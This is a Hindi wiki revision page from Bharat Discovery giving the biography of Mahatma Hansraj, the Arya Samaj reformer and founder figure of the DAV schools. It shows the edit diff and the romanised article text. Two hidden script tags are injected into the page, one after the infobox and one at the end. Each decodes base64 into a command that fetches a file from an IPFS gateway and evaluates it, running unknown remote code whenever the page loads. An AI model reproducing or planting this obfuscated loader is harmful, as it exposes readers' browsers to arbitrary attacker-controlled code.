Difference between revisions of "महात्मा हंसराज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''महात्मा हंसराज''' (जन्म- 19 अप्रैल, 1864, पंजाब; मृत्य...' के साथ नया पन्ना बनाया)
 
(13 intermediate revisions by 4 users not shown)
Line 1: Line 1:
'''महात्मा हंसराज''' (जन्म- [[19 अप्रैल]], [[1864]], [[पंजाब]]; मृत्यु- [[15 नवम्बर]], [[1938]], [[लाहौर]]) [[पंजाब]] के प्रसिद्ध [[आर्य समाज|आर्य समाजी]] नेता, समाज सुधारक और शिक्षाविद थे। उनके महत्त्वपूर्ण योगदान और प्रयासों के फलस्वरूप ही देशभर में डीएवी के नाम से 750 से भी अधिक विद्यालय व महाविद्यालय गुणवत्तापरक शिक्षा प्रदान कर रहे हैं। हंसराज जी स्वामी दयानन्द सरस्वती के विचारों से बहुत अधिक प्रभावित थे। वे जातिवाद के प्रबल विरोधकर्ता थे।  
+
{{सूचना बक्सा साहित्यकार
 +
|चित्र=Mahatma-Hansraj.jpg
 +
|चित्र का नाम=महात्मा हंसराज
 +
|पूरा नाम=महात्मा हंसराज
 +
|अन्य नाम=
 +
|जन्म=[[19 अप्रैल]], [[1864]]
 +
|जन्म भूमि=[[पंजाब]]
 +
|मृत्यु=[[15 नवम्बर]], [[1938]]
 +
|मृत्यु स्थान=[[लाहौर]]
 +
|अभिभावक=चुन्नीलाल
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=[[भारत]]
 +
|कर्म-क्षेत्र=समाज सुधारक और शिक्षाविद
 +
|मुख्य रचनाएँ=
 +
|विषय=
 +
|भाषा=
 +
|विद्यालय='गवर्नमेंट कॉलेज', [[लाहौर]]
 +
|शिक्षा=स्नातक
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=महात्मा हंसराज ने शिक्षा के प्रसार-प्रचार के क्षेत्र में अनुकरणीय योगदान दिया था।
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=आपके नेतृत्व में [[जोधपुर]] के अकाल में लोगों की सहायता हेतु 1400 अनाथ बच्चे आर्य आनाथालयों में पालन-पोषण हेतु लिये गए।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''महात्मा हंसराज''' ([[अंग्रेज़ी]]: ''Mahatma Hansraj'', जन्म- [[19 अप्रैल]], [[1864]], [[पंजाब]]; मृत्यु- [[15 नवम्बर]], [[1938]], [[लाहौर]]) [[पंजाब]] के प्रसिद्ध [[आर्य समाज|आर्य समाजी]] नेता, समाज सुधारक और शिक्षाविद थे। उनके महत्त्वपूर्ण योगदान और प्रयासों के फलस्वरूप ही देशभर में डी.ए.वी. के नाम से 750 से भी अधिक विद्यालय व महाविद्यालय गुणवत्तापरक शिक्षा प्रदान कर रहे हैं। हंसराज जी स्वामी दयानन्द सरस्वती के विचारों से बहुत अधिक प्रभावित थे। वे जातिवाद के प्रबल विरोधकर्ता थे।  
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
महात्मा हंसराज का जन्म 19 अप्रैल, 1864 ई. को [[होशियारपुर ज़िला]] (पंजाब) के बजवारा नामक स्थान पर हुआ था। इनके [[पिता]] चुन्नीलाल जी साधारण परिवार से सम्बन्ध रखते थे। हंसराज जी का बचपन अभावों में व्यतीत हुआ था। वे बचपन से ही कुशाग्र बुद्धि के थे। केवल 12 वर्ष की उम्र में ही इनके पिता का देहांत हो गया। हंसराज जी की आंरभिक शिक्षा स्थानीय स्कूल से ही प्रारम्भ हुई थी। डिग्री की शिक्षा उन्होंने 'गवर्नमेंट कॉलेज', [[लाहौर]] से पूरी की।
+
महात्मा हंसराज का जन्म 19 अप्रैल, 1864 ई. को [[होशियारपुर ज़िला]], [[पंजाब]] के बजवारा नामक स्थान पर हुआ था। इनके [[पिता]] चुन्नीलाल जी साधारण [[परिवार]] से सम्बन्ध रखते थे। हंसराज जी का बचपन अभावों में व्यतीत हुआ था। वे बचपन से ही कुशाग्र बुद्धि के थे। केवल 12 वर्ष की उम्र में ही इनके पिता का देहांत हो गया। हंसराज जी की आंरभिक शिक्षा स्थानीय स्कूल से ही प्रारम्भ हुई थी। डिग्री की शिक्षा उन्होंने 'गवर्नमेंट कॉलेज', [[लाहौर]] से पूरी की।
 
====स्वामी दयानन्द का प्रभाव====
 
====स्वामी दयानन्द का प्रभाव====
सन [[1885]] में जब वे लाहौर में अपने बड़े भाई मुल्कराज के यहाँ रहकर शिक्षा प्राप्त कर रहे थे, उसी समय लाहौर में [[स्वामी दयानन्द सरस्वती]] के सत्संग में जाने का अवसर इन्हें मिला। स्वामी दयानन्द के प्रवचन का युवक हंसराज पर बहुत प्रभाव पड़ा। अब उन्होंने समाज सेवा को ही अपने जीवन का लक्ष्य बना लिया। हंसराज जी आवश्यक कार्यों से बचा सारा समय मोहल्ले के गरीब तथा अनपढ़ लोगों की चिट्ठी-पत्री पढ़ने और लिखने में ही लगा देते थे।
+
सन [[1885]] में जब वे लाहौर में अपने बड़े भाई मुल्कराज के यहाँ रहकर शिक्षा प्राप्त कर रहे थे, उसी समय लाहौर में [[स्वामी दयानन्द सरस्वती]] के सत्संग में जाने का अवसर इन्हें मिला। स्वामी दयानन्द के प्रवचन का युवक हंसराज पर बहुत प्रभाव पड़ा। अब उन्होंने समाज सेवा को ही अपने जीवन का लक्ष्य बना लिया। हंसराज जी आवश्यक कार्यों से बचा सारा समय मोहल्ले के ग़रीब तथा अनपढ़ लोगों की चिट्ठी-पत्री पढ़ने और लिखने में ही लगा देते थे।
 
==विद्यालय की स्थापना==
 
==विद्यालय की स्थापना==
स्वामी दयानन्द की स्मृति मे एक शिक्षण संस्था की स्थापना का विचार बहुत समय से चल रहा था। पंरन्तु धन का अभाव इनके रास्ते में आ रहा था। उनके बड़े भाई लाला मुल्कराज स्वंय भी [[आर्य समाज]] के विचारों वाले व्यक्ति थे। उन्होंने हंसराज के सामने प्रस्ताव रखा कि वे इस शिक्षा संस्था का अवैतनिक प्रधानाध्यापक बनना स्वीकार कर लें। उनके भरण-पोषण के लिए वे हंसराज को अपना आधा वेतन अर्थात तीस रुपये प्रति मास देते रहेगें। व्यक्तिगत सुख के ऊपर समाज की सेवा को प्रधानता देने वाले हंसराज ने संहर्ष ही इसे स्वीकर कर लिया। इस प्रकार [[1 जून]], [[1886]] को महात्मा हंसराज 'दयानन्द एग्लो-वैदिक हाई स्कूल' लाहौर के अवैतनिक प्रधानाध्यापक बन गए। इस समय उनकी आयु 22 वर्ष थी।
+
स्वामी दयानन्द की स्मृति मे एक शिक्षण संस्था की स्थापना का विचार बहुत समय से चल रहा था। पंरन्तु धन का अभाव इनके रास्ते में आ रहा था। उनके बड़े भाई लाला मुल्कराज स्वंय भी [[आर्य समाज]] के विचारों वाले व्यक्ति थे। उन्होंने हंसराज के सामने प्रस्ताव रखा कि वे इस शिक्षा संस्था का अवैतनिक प्रधानाध्यापक बनना स्वीकार कर लें। उनके भरण-पोषण के लिए वे हंसराज को अपना आधा वेतन अर्थात तीस रुपये प्रति मास देते रहेगें। व्यक्तिगत सुख के ऊपर समाज की सेवा को प्रधानता देने वाले हंसराज ने संहर्ष ही इसे स्वीकर कर लिया। इस प्रकार [[1 जून]], [[1886]] को महात्मा हंसराज 'दयानन्द एंग्लो-वैदिक हाई स्कूल' लाहौर के अवैतनिक प्रधानाध्यापक बन गए। इस समय उनकी आयु 22 वर्ष थी।
====समाज सेवा====
+
==समाज सेवा==
सन [[1889]] में 'दयानन्द एग्लो-वैदिक हाई स्कूल' एक कॉलेज बन गया। इस पर भी हंसराज जी अवैतनिक रूप से कार्य करते रहे। उन्होंने सन [[1911]] तक इस पद पर कार्य किया। इसके बाद ही उन्हें 'दयानन्द कॉलेज प्रंबध समिति' का अध्यक्ष चुन लिया गया। वर्ष [[1918]] में लोग उन्हें पुनः इस पद पर चुनना चाहते थे, पर महात्मा हंसराज इसके लिए तैयार नहीं हुए। इसके बाद उन्होंने अपना पूरा समय समाज सेवा को समर्पित कर दिया। [[1919]] में उन्होंने [[अमृतसर]] में 'इंडियन सोशल कांफ़्रेंस' की अध्यक्षता की। देश-विदेश के आर्य समाजियों की जो पहली कांफ़्रेंस [[1927]] में [[भारत]] में हुई, वे उसके अध्यक्ष भी चुने गए।
+
सन [[1889]] में 'दयानन्द एंग्लो-वैदिक हाई स्कूल' एक कॉलेज बन गया। इस पर भी हंसराज जी अवैतनिक रूप से कार्य करते रहे। उन्होंने सन [[1911]] तक इस पद पर कार्य किया। इसके बाद ही उन्हें 'दयानन्द कॉलेज प्रंबध समिति' का अध्यक्ष चुन लिया गया। वर्ष [[1918]] में लोग उन्हें पुनः इस पद पर चुनना चाहते थे, पर महात्मा हंसराज इसके लिए तैयार नहीं हुए। इसके बाद उन्होंने अपना पूरा समय समाज सेवा को समर्पित कर दिया। [[1919]] में उन्होंने [[अमृतसर]] में 'इंडियन सोशल कांफ़्रेंस' की अध्यक्षता की। देश-विदेश के आर्य समाजियों की जो पहली कांफ़्रेंस [[1927]] में [[भारत]] में हुई, वे उसके अध्यक्ष भी चुने गए।
 +
====महत्त्वपूर्ण कार्य====
 +
महात्मा हंसराज जी के कुछ महत्त्वपूर्ण कार्य इस प्रकार थे-
 +
*सन [[1922]] में हंसराज जी के कार्यकर्ता [[केरल]] के 2500 से भी अधिक लोगों को पुन: [[हिन्दू धर्म]] में वापस लाये। ये लोग '[[मोपला विद्रोह]]' में बलपूर्वक [[मुस्लिम]] बना दिये गये थे। विकट परिस्थितियों के बावजूद भी यह कार्य महात्मा हंसराज के नेतृत्व में एक शिविर लगाकर लाला कौशलचन्द और पंडित मस्तान चन्द ने किया था।
 +
*सन [[1895]] में [[बीकानेर]] में आये भीषण अकाल के दौरान दो वर्षों तक बचाव व सहायता का कार्य किया और '[[ईसाई मिशनरी|ईसाई मिशनरियों]]' को सेवा के छद्मवेश में पीड़ित जनता का धर्म-परिवर्तन करने से रोका। [[लाला लाजपतराय]] इस कार्य में अग्रणी रहे।
 +
*[[जोधपुर]] के अकाल में लोगों की सहायता हेतु 1400 अनाथ बच्चे आर्य अनाथालयों में पालन-पोषण के लिये लाये गये।
 
==राष्ट्रभक्त==
 
==राष्ट्रभक्त==
 
महात्मा हंसराज एक राष्ट्रभक्त भी थे, परंतु '[[असहयोग आंदोलन]]' के समय उन्होंने डी.ए.वी. कॉलेजों को बन्द करने का घोर विरोध किया था। उनका कहना था कि इन कॉलेजों पर न तो विदेशी सरकार का कोई नियंत्रण है और न ही ये सरकार से किसी प्रकार की सहायता लेते हैं।
 
महात्मा हंसराज एक राष्ट्रभक्त भी थे, परंतु '[[असहयोग आंदोलन]]' के समय उन्होंने डी.ए.वी. कॉलेजों को बन्द करने का घोर विरोध किया था। उनका कहना था कि इन कॉलेजों पर न तो विदेशी सरकार का कोई नियंत्रण है और न ही ये सरकार से किसी प्रकार की सहायता लेते हैं।
Line 13: Line 51:
 
महात्मा हंसराज जातिवाद के प्रबल विरोधी थे और इसे [[हिन्दू धर्म]] की उन्नति के मार्ग की बहुत बड़ी बाधा मानते थे। उन्होंने शिक्षा प्रसार के क्षेत्र में अनुकरणीय योगदान दिया था।
 
महात्मा हंसराज जातिवाद के प्रबल विरोधी थे और इसे [[हिन्दू धर्म]] की उन्नति के मार्ग की बहुत बड़ी बाधा मानते थे। उन्होंने शिक्षा प्रसार के क्षेत्र में अनुकरणीय योगदान दिया था।
 
==निधन==
 
==निधन==
अपनी समाज सेवा, कर्तव्यनिष्ठा की भावना और शिक्षा के क्षेत्र में बहुमूल्य योगदान करने वाले महात्मा हंसराज का [[15 नवम्बर]], सन [[1938]] ई. में देहांत हुआ।  
+
अपनी समाज सेवा, कर्तव्यनिष्ठा की भावना और शिक्षा के क्षेत्र में बहुमूल्य योगदान करने वाले महात्मा हंसराज का [[15 नवम्बर]], सन [[1938]] ई. में देहांत हुआ।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
Line 19: Line 57:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{समाज सुधारक}}
[[Category:नया पन्ना नवम्बर-2012]]
+
[[Category:समाज सुधारक]][[Category:शिक्षक]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:सामाजिक कार्यकर्ता]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 05:34, 19 April 2018

mahatma hansaraj
poora nam mahatma hansaraj
janm 19 aprail, 1864
janm bhoomi panjab
mrityu 15 navambar, 1938
mrityu sthan lahaur
abhibhavak chunnilal
karm bhoomi bharat
karm-kshetr samaj sudharak aur shikshavid
vidyalay 'gavarnameant k aaulej', lahaur
shiksha snatak
vishesh yogadan mahatma hansaraj ne shiksha ke prasar-prachar ke kshetr mean anukaraniy yogadan diya tha.
nagarikata bharatiy
any janakari apake netritv mean jodhapur ke akal mean logoan ki sahayata hetu 1400 anath bachche ary anathalayoan mean palan-poshan hetu liye ge.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

mahatma hansaraj (aangrezi: Mahatma Hansraj, janm- 19 aprail, 1864, panjab; mrityu- 15 navambar, 1938, lahaur) panjab ke prasiddh ary samaji neta, samaj sudharak aur shikshavid the. unake mahattvapoorn yogadan aur prayasoan ke phalasvaroop hi deshabhar mean di.e.vi. ke nam se 750 se bhi adhik vidyalay v mahavidyalay gunavattaparak shiksha pradan kar rahe haian. hansaraj ji svami dayanand sarasvati ke vicharoan se bahut adhik prabhavit the. ve jativad ke prabal virodhakarta the.

janm tatha shiksha

mahatma hansaraj ka janm 19 aprail, 1864 ee. ko hoshiyarapur zila, panjab ke bajavara namak sthan par hua tha. inake pita chunnilal ji sadharan parivar se sambandh rakhate the. hansaraj ji ka bachapan abhavoan mean vyatit hua tha. ve bachapan se hi kushagr buddhi ke the. keval 12 varsh ki umr mean hi inake pita ka dehaant ho gaya. hansaraj ji ki aanrabhik shiksha sthaniy skool se hi prarambh huee thi. digri ki shiksha unhoanne 'gavarnameant k aaulej', lahaur se poori ki.

svami dayanand ka prabhav

san 1885 mean jab ve lahaur mean apane b de bhaee mulkaraj ke yahaan rahakar shiksha prapt kar rahe the, usi samay lahaur mean svami dayanand sarasvati ke satsang mean jane ka avasar inhean mila. svami dayanand ke pravachan ka yuvak hansaraj par bahut prabhav p da. ab unhoanne samaj seva ko hi apane jivan ka lakshy bana liya. hansaraj ji avashyak karyoan se bacha sara samay mohalle ke garib tatha anapadh logoan ki chitthi-patri padhane aur likhane mean hi laga dete the.

vidyalay ki sthapana

svami dayanand ki smriti me ek shikshan sanstha ki sthapana ka vichar bahut samay se chal raha tha. panrantu dhan ka abhav inake raste mean a raha tha. unake b de bhaee lala mulkaraj svany bhi ary samaj ke vicharoan vale vyakti the. unhoanne hansaraj ke samane prastav rakha ki ve is shiksha sanstha ka avaitanik pradhanadhyapak banana svikar kar lean. unake bharan-poshan ke lie ve hansaraj ko apana adha vetan arthat tis rupaye prati mas dete rahegean. vyaktigat sukh ke oopar samaj ki seva ko pradhanata dene vale hansaraj ne sanharsh hi ise svikar kar liya. is prakar 1 joon, 1886 ko mahatma hansaraj 'dayanand eanglo-vaidik haee skool' lahaur ke avaitanik pradhanadhyapak ban ge. is samay unaki ayu 22 varsh thi.

samaj seva

san 1889 mean 'dayanand eanglo-vaidik haee skool' ek k aaulej ban gaya. is par bhi hansaraj ji avaitanik roop se kary karate rahe. unhoanne san 1911 tak is pad par kary kiya. isake bad hi unhean 'dayanand k aaulej pranbadh samiti' ka adhyaksh chun liya gaya. varsh 1918 mean log unhean punah is pad par chunana chahate the, par mahatma hansaraj isake lie taiyar nahian hue. isake bad unhoanne apana poora samay samaj seva ko samarpit kar diya. 1919 mean unhoanne amritasar mean 'iandiyan soshal kaanfreans' ki adhyakshata ki. desh-videsh ke ary samajiyoan ki jo pahali kaanfreans 1927 mean bharat mean huee, ve usake adhyaksh bhi chune ge.

mahattvapoorn kary

mahatma hansaraj ji ke kuchh mahattvapoorn kary is prakar the-

  • san 1922 mean hansaraj ji ke karyakarta keral ke 2500 se bhi adhik logoan ko pun: hindoo dharm mean vapas laye. ye log 'mopala vidroh' mean balapoorvak muslim bana diye gaye the. vikat paristhitiyoan ke bavajood bhi yah kary mahatma hansaraj ke netritv mean ek shivir lagakar lala kaushalachand aur pandit mastan chand ne kiya tha.
  • san 1895 mean bikaner mean aye bhishan akal ke dauran do varshoan tak bachav v sahayata ka kary kiya aur 'eesaee mishanariyoan' ko seva ke chhadmavesh mean pi dit janata ka dharm-parivartan karane se roka. lala lajapataray is kary mean agrani rahe.
  • jodhapur ke akal mean logoan ki sahayata hetu 1400 anath bachche ary anathalayoan mean palan-poshan ke liye laye gaye.

rashtrabhakt

mahatma hansaraj ek rashtrabhakt bhi the, parantu 'asahayog aandolan' ke samay unhoanne di.e.vi. k aaulejoan ko band karane ka ghor virodh kiya tha. unaka kahana tha ki in k aaulejoan par n to videshi sarakar ka koee niyantran hai aur n hi ye sarakar se kisi prakar ki sahayata lete haian.

jativad ke virodhi

mahatma hansaraj jativad ke prabal virodhi the aur ise hindoo dharm ki unnati ke marg ki bahut b di badha manate the. unhoanne shiksha prasar ke kshetr mean anukaraniy yogadan diya tha.

nidhan

apani samaj seva, kartavyanishtha ki bhavana aur shiksha ke kshetr mean bahumooly yogadan karane vale mahatma hansaraj ka 15 navambar, san 1938 ee. mean dehaant hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>